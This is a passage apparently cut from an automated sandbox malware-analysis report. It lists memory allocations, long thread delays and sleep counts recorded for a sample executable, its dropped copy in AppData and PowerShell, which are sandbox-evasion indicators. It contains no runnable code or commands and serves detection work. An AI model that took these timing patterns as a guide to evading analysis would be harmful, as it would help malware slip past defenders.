                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeMemory allocated: B020000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeMemory allocated: 1560000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeMemory allocated: 31E0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeMemory allocated: 3020000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeMemory allocated: 1440000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeMemory allocated: 2F70000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeMemory allocated: 2DE0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeMemory allocated: 8B20000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeMemory allocated: 9B20000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeMemory allocated: 9D10000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeMemory allocated: AD10000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeMemory allocated: 32A0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeMemory allocated: 3340000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeMemory allocated: 5340000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 599890Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 599781Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 599672Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 599562Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 599453Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 599344Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 599234Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 599125Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 599016Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 598906Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 598797Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 598687Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 598577Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 598465Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 598359Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 598250Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 598134Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 598016Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 597906Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 597795Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 597687Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 597578Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 597466Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 597359Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 597250Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 597140Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 597031Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 596921Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 596812Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 596702Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 596593Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 596484Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 596375Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 596266Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 596156Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 596047Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 595937Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 595828Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 595718Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 595609Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 595500Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 595390Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 595281Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 595172Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 595062Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 594953Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 594844Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 594733Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 594625Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 600000
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 599891
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 599766
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 599641
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 599531
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 599422
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 599285
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 599156
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 599047
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 598937
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 598828
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 598718
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 598609
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 598499
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 598390
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 598281
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 598172
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 598062
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 597953
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 597843
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 597730
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 597609
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 597500
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 597390
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 597281
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 597172
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 597062
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 596948
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 596828
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 596687
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 596578
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 596469
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 596331
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 596203
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 596092
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 595984
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 595872
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 595766
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 595654
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 595547
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 595437
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 595328
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 595219
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 595094
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 594984
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 594874
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 594766
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 594656
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 594547
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeThread delayed: delay time: 594437
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5045Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6449Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 616Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeWindow / User API: threadDelayed 2596Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeWindow / User API: threadDelayed 7261Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeWindow / User API: threadDelayed 7663
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeWindow / User API: threadDelayed 2188
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 6532Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7220Thread sleep count: 5045 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7392Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7220Thread sleep count: 230 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7260Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7416Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7360Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640Thread sleep count: 36 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640Thread sleep time: -33204139332677172s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640Thread sleep time: -600000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7644Thread sleep count: 2596 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640Thread sleep time: -599890s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7644Thread sleep count: 7261 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640Thread sleep time: -599781s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640Thread sleep time: -599672s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640Thread sleep time: -599562s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640Thread sleep time: -599453s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640Thread sleep time: -599344s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640Thread sleep time: -599234s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640Thread sleep time: -599125s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640Thread sleep time: -599016s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640Thread sleep time: -598906s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640Thread sleep time: -598797s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640Thread sleep time: -598687s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640Thread sleep time: -598577s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640Thread sleep time: -598465s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640Thread sleep time: -598359s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640Thread sleep time: -598250s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640Thread sleep time: -598134s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640Thread sleep time: -598016s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640Thread sleep time: -597906s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640Thread sleep time: -597795s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640Thread sleep time: -597687s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640Thread sleep time: -597578s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640Thread sleep time: -597466s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640Thread sleep time: -597359s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640Thread sleep time: -597250s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640Thread sleep time: -597140s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640Thread sleep time: -597031s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640Thread sleep time: -596921s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640Thread sleep time: -596812s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640Thread sleep time: -596702s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640Thread sleep time: -596593s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640Thread sleep time: -596484s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640Thread sleep time: -596375s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640Thread sleep time: -596266s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640Thread sleep time: -596156s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640Thread sleep time: -596047s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640Thread sleep time: -595937s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640Thread sleep time: -595828s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640Thread sleep time: -595718s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640Thread sleep time: -595609s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640Thread sleep time: -595500s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640Thread sleep time: -595390s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640Thread sleep time: -595281s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640Thread sleep time: -595172s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640Thread sleep time: -595062s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640Thread sleep time: -594953s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640Thread sleep time: -594844s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640Thread sleep time: -594733s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640Thread sleep time: -594625s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7588Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864Thread sleep count: 36 > 30
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864Thread sleep time: -33204139332677172s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864Thread sleep time: -600000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864Thread sleep time: -599891s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7872Thread sleep count: 7663 > 30
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7872Thread sleep count: 2188 > 30
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864Thread sleep time: -599766s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864Thread sleep time: -599641s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864Thread sleep time: -599531s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864Thread sleep time: -599422s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864Thread sleep time: -599285s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864Thread sleep time: -599156s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864Thread sleep time: -599047s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864Thread sleep time: -598937s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864Thread sleep time: -598828s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864Thread sleep time: -598718s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864Thread sleep time: -598609s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864Thread sleep time: -598499s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864Thread sleep time: -598390s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864Thread sleep time: -598281s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864Thread sleep time: -598172s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864Thread sleep time: -598062s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864Thread sleep time: -597953s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864Thread sleep time: -597843s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864Thread sleep time: -597730s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864Thread sleep time: -597609s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864Thread sleep time: -597500s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864Thread sleep time: -597390s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864Thread sleep time: -597281s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864Thread sleep time: -597172s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864Thread sleep time: -597062s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864Thread sleep time: -596948s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864Thread sleep time: -596828s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864Thread sleep time: -596687s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864Thread sleep time: -596578s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864Thread sleep time: -596469s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864Thread sleep time: -596331s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864Thread sleep time: -596203s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864Thread sleep time: -596092s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864Thread sleep time: -595984s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864Thread sleep time: -595872s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864Thread sleep time: -595766s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864Thread sleep time: -595654s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864Thread sleep time: -595547s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864Thread sleep time: -595437s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864Thread sleep time: -595328s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864Thread sleep time: -595219s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864Thread sleep time: -595094s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864Thread sleep time: -594984s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864Thread sleep time: -594874s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864Thread sleep time: -594766s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864Thread sleep time: -594656s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864Thread sleep time: -594547s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864Thread sleep time: -594437s >= -30000s
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 599890Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 599781Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 599672Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 599562Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 599453Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 599344Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 599234Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 599125Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 599016Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 598906Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 598797Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeThread delayed: delay time: 598687Jump to behavior
